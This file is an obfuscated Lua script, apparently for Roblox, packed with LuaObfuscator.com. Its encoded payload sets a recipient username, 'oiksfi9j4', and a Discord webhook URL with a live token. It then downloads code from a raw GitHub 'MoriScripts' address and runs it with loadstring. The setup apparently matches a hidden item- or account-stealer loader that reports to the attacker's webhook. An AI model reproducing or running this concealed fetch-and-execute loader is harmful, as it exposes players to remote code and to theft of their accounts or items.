--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -(1 + 0))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v70-(v70%1) ;else local v71=(570 -((523 -156) + (1266 -(68 + 997))))^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1270 -(226 + 1044) ;local v35;local v36;local v37;local v38;while true do if (v34==(4 -(4 -1))) then return (v38 * (16777333 -(32 + 85))) + (v37 * (64226 + (1660 -(87 + 263)))) + (v36 * (57 + (379 -(67 + 113)))) + v35 ;end if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (960 -(892 + 65)) );v19=v19 + (9 -5) ;v34=1 -0 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=202 -(14 + 188) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(676 -(534 + 141))) then else local v74=0 + 0 ;local v75;while true do if (v74~=(0 + 0)) then else v75=413 -(15 + 398) ;while true do if (v75==1) then v39=984 -(18 + 964) ;break;end if (v75==(0 + 0)) then local v107=0;while true do if (v107~=(0 -0)) then else v42=nil;v43=nil;v107=1 -0 ;end if (v107==(2 -1)) then v75=851 -(20 + 830) ;break;end end end end break;end end end if (v39==(2 + 0)) then v44=nil;v45=nil;v39=129 -(116 + 10) ;end if (v39==(0 + 0)) then local v76=0;while true do if (v76==(0 + 0)) then local v100=396 -(115 + 281) ;while true do if (v100==(2 -1)) then v76=1;break;end if (v100==(0 + 0)) then v40=0 + 0 ;v41=nil;v100=2 -1 ;end end end if (v76~=1) then else v39=1;break;end end end if ((10 -7)==v39) then v46=nil;while true do local v80=0 -0 ;local v81;local v82;while true do if (0==v80) then v81=867 -(550 + 317) ;v82=nil;v80=2 -1 ;end if (v80==1) then while true do if (v81~=0) then else v82=1551 -(1126 + 425) ;while true do if (v82~=(1 -0)) then else if (v40~=(3 -0)) then else local v147=1121 -(118 + 1003) ;local v148;while true do if (v147~=0) then else v148=0 -0 ;while true do if ((285 -(134 + 151))==v148) then local v175=377 -(142 + 235) ;while true do if (v175==(1665 -(970 + 695))) then for v185=1 -0 ,v24() do v42[v185-(1 + 0) ]=v29();end return v44;end end end end break;end end end if (v40==2) then local v149=1990 -(582 + 1408) ;local v150;while true do if (v149~=(0 -0)) then else v150=0;while true do if ((0 -0)==v150) then local v176=0 -0 ;while true do if (v176==(3 -2)) then v150=1825 -(1195 + 629) ;break;end if ((0 + 0)~=v176) then else local v183=0 -0 ;while true do if ((0 -0)==v183) then for v188=242 -(187 + 54) ,v45 do local v189=780 -(162 + 618) ;local v190;local v191;local v192;while true do if (v189==(0 + 0)) then v190=0 + 0 ;v191=nil;v189=1;end if ((1 -0)==v189) then v192=nil;while true do if (v190~=(0 -0)) then else local v196=0 + 0 ;local v197;while true do if (0~=v196) then else v197=1636 -(1373 + 263) ;while true do if ((1330 -(797 + 532))==v197) then v190=1001 -(451 + 549) ;break;end if (v197~=0) then else v191=v22();v192=nil;v197=1 + 0 ;end end break;end end end if (v190~=(2 -1)) then else if (v191==(1 -0)) then v192=v22()~=(0 -0) ;elseif (v191==(1386 -(746 + 638))) then v192=v25();elseif (v191~=3) then else v192=v26();end v46[v188]=v192;break;end end break;end end end v44[3]=v22();v183=1 + 0 ;end if (v183~=(1 -0)) then else v176=342 -(218 + 123) ;break;end end end end end if (v150==(1582 -(1535 + 46))) then for v177=1,v24() do local v178=0 + 0 ;local v179;local v180;local v181;local v182;while true do if (v178~=(2 + 0)) then else while true do if (v179~=(1 + 0)) then else v182=nil;while true do if (v180~=(561 -(306 + 254))) then else while true do if (v181==(0 -0)) then v182=v22();if (v21(v182,1 + 0 ,239 -(64 + 174) )==(0 -0)) then local v199=1467 -(899 + 568) ;local v200;local v201;local v202;local v203;while true do if (v199==0) then local v204=0 -0 ;while true do if (v204~=(0 + 0)) then else v200=0 -0 ;v201=nil;v204=217 -(42 + 174) ;end if (v204==(604 -(268 + 335))) then v199=1 + 0 ;break;end end end if (v199==(291 -(60 + 230))) then local v205=0 + 0 ;while true do if (v205==(0 + 0)) then v202=nil;v203=nil;v205=1;end if (v205==(573 -(426 + 146))) then v199=2;break;end end end if (v199~=(1 + 1)) then else while true do if (v200==2) then local v206=0;while true do if (v206==(1457 -(282 + 1174))) then v200=1583 -(1183 + 397) ;break;end if ((0 -0)==v206) then if (v21(v202,1 + 0 ,812 -(569 + 242) )==(1976 -(1913 + 62))) then v203[5 -3 ]=v46[v203[1 + 1 ]];end if (v21(v202,5 -3 ,2)==1) then v203[1027 -(706 + 318) ]=v46[v203[1254 -(721 + 530) ]];end v206=1272 -(945 + 326) ;end end end if (v200==(11 -8)) then if (v21(v202,7 -4 ,3 + 0 )~=(1 + 0)) then else v203[860 -(564 + 292) ]=v46[v203[704 -(271 + 429) ]];end v41[v177]=v203;break;end if (v200==(0 + 0)) then v201=v21(v182,1502 -(1408 + 92) ,3);v202=v21(v182,4 + 0 ,482 -(41 + 435) );v200=1;end if (v200==(1002 -(938 + 63))) then v203={v23(),v23(),nil,nil};if (v201==(1288 -(993 + 295))) then local v210=0 + 0 ;local v211;while true do if (v210==0) then v211=0 + 0 ;while true do if (v211~=0) then else v203[1174 -(418 + 753) ]=v23();v203[2 + 2 ]=v23();break;end end break;end end elseif (v201==(1 + 0)) then v203[1 + 2 ]=v24();elseif (v201==2) then v203[1 + 2 ]=v24() -((531 -(406 + 123))^16) ;elseif (v201~=3) then else local v220=1769 -(1749 + 20) ;local v221;local v222;while true do if ((0 + 0)==v220) then v221=1322 -(1249 + 73) ;v222=nil;v220=1 + 0 ;end if (v220==1) then while true do if (v221~=(1145 -(466 + 679))) then else v222=0 -0 ;while true do if (v222==(0 -0)) then v203[3]=v24() -((5 -3)^(1034 -(697 + 321))) ;v203[10 -6 ]=v23();break;end end break;end end break;end end end v200=1902 -(106 + 1794) ;end end break;end end end break;end end break;end if ((0 -0)~=v180) then else local v194=0 + 0 ;local v195;while true do if (v194~=0) then else v195=0 + 0 ;while true do if (v195==(0 -0)) then v181=0 -0 ;v182=nil;v195=1;end if ((1 + 0)==v195) then v180=1 -0 ;break;end end break;end end end end break;end if (v179==(0 -0)) then local v193=0;while true do if (v193==(2 -1)) then v179=115 -(4 + 110) ;break;end if (v193==(584 -(57 + 527))) then v180=611 -(602 + 9) ;v181=nil;v193=1428 -(41 + 1386) ;end end end end break;end if ((103 -(17 + 86))==v178) then v179=0 + 0 ;v180=nil;v178=1 -0 ;end if (v178==(2 -1)) then v181=nil;v182=nil;v178=949 -(245 + 702) ;end end end v40=3;break;end end break;end end end break;end if (v82==0) then local v112=0 -0 ;while true do if (v112==(0 + 0)) then if (v40==(166 -(122 + 44))) then local v171=0;local v172;while true do if ((0 -0)==v171) then v172=1898 -(260 + 1638) ;while true do if (v172~=0) then else local v184=0;while true do if (v184~=(3 -2)) then else v172=1 + 0 ;break;end if (v184~=0) then else v41={};v42={};v184=1 + 0 ;end end end if (v172==(1 -0)) then v43={};v40=66 -(30 + 35) ;break;end end break;end end end if (v40~=1) then else local v173=0;local v174;while true do if (v173==0) then v174=0 + 0 ;while true do if (0==v174) then v44={v41,v42,nil,v43};v45=v24();v174=3 -2 ;end if (v174~=(1213 -(323 + 889))) then else v46={};v40=4 -2 ;break;end end break;end end end v112=2 -1 ;end if (v112==1) then v82=581 -(361 + 219) ;break;end end end end break;end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if ((1692 -(1121 + 569))==v47) then v52=v21(v49,235 -(22 + 192) ,(589 + 125) -((1209 -726) + 200) );v53=((v21(v49,1495 -(1404 + 59) )==(2 -1)) and  -((1 + 0) -0)) or (766 -(468 + 297)) ;v47=565 -(334 + 228) ;end if (v47==1) then v50=3 -2 ;v51=(v21(v49,(851 -(254 + 595)) -1 ,(162 -(55 + 71)) -16 ) * ((1 + 1)^(268 -(141 + 95)))) + v48 ;v47=2;end if (v47==(3 + 0)) then if (v52==(0 -(0 -0))) then if (v51==(0 -0)) then return v53 * (0 + 0) ;else local v101=0;while true do if (v101==(0 -0)) then v52=1 + 0 ;v50=0 + 0 ;break;end end end elseif (v52==(2881 -834)) then return ((v51==0) and (v53 * (1/(0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(1186 -(92 + 71)) ) * (v50 + (v51/((1 + 1)^(86 -34)))) ;end if (v47==0) then v48=v24();v49=v24();v47=766 -(574 + (1981 -(573 + 1217))) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1 + 0) );v19=v19 + v54 ;local v56={};for v68=1, #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + 2 );v19=v19 + (5 -3) ;return (v59 * (356 -100)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v60,16));if v20 then local v102=v5(v73,v20);v20=nil;return v102;else return v73;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v83=v65;local v84=v66;local v85=v67;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=5) then if (v96<=2) then if (v96<=0) then local v108=v95[2];v93[v108]=v93[v108](v13(v93,v108 + 1 ,v88));elseif (v96==1) then v87=v95[3];else local v114;local v115,v116;local v117;local v118;v63[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v63[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v63[v95[3]];v87=v87 + 1 ;v95=v83[v87];v118=v95[2];v117=v93[v95[3]];v93[v118 + 1 ]=v117;v93[v118]=v117[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v95=v83[v87];v118=v95[2];v115,v116=v86(v93[v118](v13(v93,v118 + 1 ,v95[3])));v88=(v116 + v118) -1 ;v114=0;for v142=v118,v88 do v114=v114 + 1 ;v93[v142]=v115[v114];end v87=v87 + 1 ;v95=v83[v87];v118=v95[2];v93[v118]=v93[v118](v13(v93,v118 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];end elseif (v96<=3) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96>4) then v93[v95[2]]=v95[3]~=0 ;else local v130=v95[2];local v131,v132=v86(v93[v130](v13(v93,v130 + 1 ,v95[3])));v88=(v132 + v130) -1 ;local v133=0;for v145=v130,v88 do local v146=0;while true do if (v146==0) then v133=v133 + 1 ;v93[v145]=v131[v133];break;end end end end elseif (v96<=8) then if (v96<=6) then v93[v95[2]]=v95[3];elseif (v96>7) then v63[v95[3]]=v93[v95[2]];else v93[v95[2]]=v63[v95[3]];end elseif (v96<=10) then if (v96==9) then local v138=0;local v139;local v140;while true do if (v138==0) then v139=v95[2];v140=v93[v95[3]];v138=1;end if (v138==1) then v93[v139 + 1 ]=v140;v93[v139]=v140[v95[4]];break;end end else do return;end end elseif (v96>11) then local v141=0;while true do if (v141==2) then v63[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v141=3;end if (v141==1) then v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v141=2;end if (v141==4) then v87=v95[3];break;end if (v141==0) then v63[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v141=1;end if (v141==3) then v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v141=4;end end else v93[v95[2]]();end v87=v87 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203093O006F696B736669396A34030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135312O392O30352O3138323438353637342F7054726D2O66634775654A344B4C6D337A3656684735484756507A356B4B4D526A666C4358525439646B334E4530426630567154674B3735366B6F7972684553614A6C6D00173O0012063O00013O0026033O000E000100020004013O000E0001001206000100043O001202000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026033O0001000100010004013O00010001001206000100043O00120C000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O000A3O00017O00",v9(),...);
